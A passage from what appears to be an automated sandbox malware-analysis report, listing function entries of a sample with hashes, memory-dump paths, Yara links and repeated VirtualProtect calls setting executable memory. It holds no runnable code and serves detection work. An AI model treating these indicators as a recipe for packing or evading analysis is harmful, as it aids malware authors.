                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 07d21b7d3cc7c4c10eff04a9f666629b599e6123287b287356066a7a6680f988
                                                                                                                                              • Instruction ID: 99fb7f812fc30dd67a8a23df3a2d064b4511fad256f5c479e17d888b49691586
                                                                                                                                              • Opcode Fuzzy Hash: 07d21b7d3cc7c4c10eff04a9f666629b599e6123287b287356066a7a6680f988
                                                                                                                                              • Instruction Fuzzy Hash: 8ED134A2D082649AF7208624DC447EB7A68DF51314F0440FED98DA72C1DABE5FC6CB67
                                                                                                                                              Function 00408020 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 353memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: f7584e4d2a8087fb65cfc1a0ca62cb735ae4cda63d473a9d9d38d3484e92d711
                                                                                                                                              • Instruction ID: 2eb3e874b1c4aa01e51b347669719f9f5b5e43f5857c0d317553baf01cd7914e
                                                                                                                                              • Opcode Fuzzy Hash: f7584e4d2a8087fb65cfc1a0ca62cb735ae4cda63d473a9d9d38d3484e92d711
                                                                                                                                              • Instruction Fuzzy Hash: 47D136B2C042649AF7208624DC447EB7A69DF51314F1440FED98DA62C1DABE1FC6CB67
                                                                                                                                              Function 00407652 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 349COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 1be0917443ebbe20a96136dd23fbac885d9b2a13d24d572ba56184e524df3c9a
                                                                                                                                              • Instruction ID: ca2380e374f470f38af7b9893bc6be273685a27750bc787c277f5f52459a791b
                                                                                                                                              • Opcode Fuzzy Hash: 1be0917443ebbe20a96136dd23fbac885d9b2a13d24d572ba56184e524df3c9a
                                                                                                                                              • Instruction Fuzzy Hash: 0BC136A2D082649AF7208624DC447EB7A69DF51314F0840FED98D672C1DABE1FC6CB67
                                                                                                                                              Function 004080A5 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 346memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 4e182af6198bdb259ac28646dfb70ca7a0c84178e6bb25da822de0b004e48401
                                                                                                                                              • Instruction ID: 785747cffc71ee2e623740ec2709f746bb4eecd73c091485c27e31070438e9fb
                                                                                                                                              • Opcode Fuzzy Hash: 4e182af6198bdb259ac28646dfb70ca7a0c84178e6bb25da822de0b004e48401
                                                                                                                                              • Instruction Fuzzy Hash: 63C135B2C042649AF7208624DC447EB7A69DF51314F1440FED98DA62C1DABE0FC68B67
                                                                                                                                              Function 00407D5C Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 344memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 9131158bdcb16dd5779c4a55038fec9e1f5f0dfb7f8ae4d7e15de7015695186a
                                                                                                                                              • Instruction ID: ea99530225736df8b548ebe2bae57b79cf499234a5dd8c7338e838a4a56707e2
                                                                                                                                              • Opcode Fuzzy Hash: 9131158bdcb16dd5779c4a55038fec9e1f5f0dfb7f8ae4d7e15de7015695186a
                                                                                                                                              • Instruction Fuzzy Hash: E5C135A2D082649AF7208624DC44BEB7A69DF51310F1440FED98D672C1DABE1FC68B67
                                                                                                                                              Function 00406D1C Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 343COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: d3c42047d87a86d63d58d84b158be34b8d2acf367a4459959edbab65f2a6965e
                                                                                                                                              • Instruction ID: d7193199d5c040545e3c9022d1fc5edff3b9aaee513072e49c1cd987f5022490
                                                                                                                                              • Opcode Fuzzy Hash: d3c42047d87a86d63d58d84b158be34b8d2acf367a4459959edbab65f2a6965e
                                                                                                                                              • Instruction Fuzzy Hash: 99C147A2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC5CBA7
                                                                                                                                              Function 00408060 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 336memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 62b09ee9c9c43222daf5d7d729e72fa8f280d2fcb39bed247f37f672a20773e2
                                                                                                                                              • Instruction ID: 02ac1c241656fbca97fd14fc078b331ed1feb611b8351a98511c686d9a3b4722
                                                                                                                                              • Opcode Fuzzy Hash: 62b09ee9c9c43222daf5d7d729e72fa8f280d2fcb39bed247f37f672a20773e2
                                                                                                                                              • Instruction Fuzzy Hash: 6EC135B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE0FC68B67
                                                                                                                                              Function 004080FE Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 336memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 12615ee431bc97ba1e0813fb1d754cd120cf9c8348520ce4a5478a199e0d867e
                                                                                                                                              • Instruction ID: c66bbedd050fd74ef394c8872448b7775fcb60110f28595935eee93ec1a4977d
                                                                                                                                              • Opcode Fuzzy Hash: 12615ee431bc97ba1e0813fb1d754cd120cf9c8348520ce4a5478a199e0d867e
                                                                                                                                              • Instruction Fuzzy Hash: 4CC125B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC68B67
                                                                                                                                              Function 00407C3A Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 336memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
